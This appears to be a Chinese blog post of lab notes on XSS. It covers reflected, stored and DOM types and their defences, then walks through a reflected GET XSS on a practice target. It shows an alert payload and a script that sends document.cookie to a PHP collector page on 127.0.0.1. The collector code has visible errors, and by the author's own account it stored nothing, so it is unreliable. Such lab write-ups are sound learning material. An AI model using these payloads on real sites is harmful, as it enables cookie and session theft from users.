XSS跨站脚本

本文详细介绍了XSS跨站脚本的类型,包括反射性XSS、存储型XSS和DOM型XSS,并通过实例展示了它们的利用方式。同时,文章探讨了XSS的防范措施,如输入过滤和输出转义。通过实例展示了如何通过反射型和存储型XSS获取用户cookie,以及如何通过DOM型XSS进行攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XSS(跨站脚本)

XSS是一种发生在前端浏览器端的漏洞,危害对象也是前端用户,形成XSS漏洞的主要原因是程序对输入输出没有做合适的处理,导致精心构造的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。
因此在XSS漏洞的防范上一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理。

  • 输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入。
  • 输出转义:根据输出点的位置对输出到前端的额呢绒进行适当转义。

反射性xss(get)

随意输入字符串,回显who is xxx,i don’t care
f12查看,允许输入最大长度为20.
捕获.PNG
更改一下可输入长度,输入一个简单的xss语句:<script>alert("XSS")</script>
发现可以解析,即存在xss漏洞。
捕获.PNG
观察源码可知,它将提交的信息重新发送回来,后台没有对我们提交的信息做任何的漏洞。GET型的xss,一般将带有xss的url伪装后发送给目标即可。
如果是post型xss,无法直接使用url的方式进行攻击。

利用

需要一个接受cookie的服务器(127.0.0.1:80),来接收受害主机的cookie。

<?php
$cookie=$_GET['cookie'];
 #fp=$fopen("cookie.txt","a");
fwirte($fp,"Cookie:".$cookie."/n")
?>
  • 构造一个xss攻击的js代码
    <script>window.open("http://127.0.0.1/getcookie.php?cookie="+document.cookie);</script>
    新弹出窗口成功获取到cookie。但是cookie.txt中并没有存储到cookie值……
    1
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值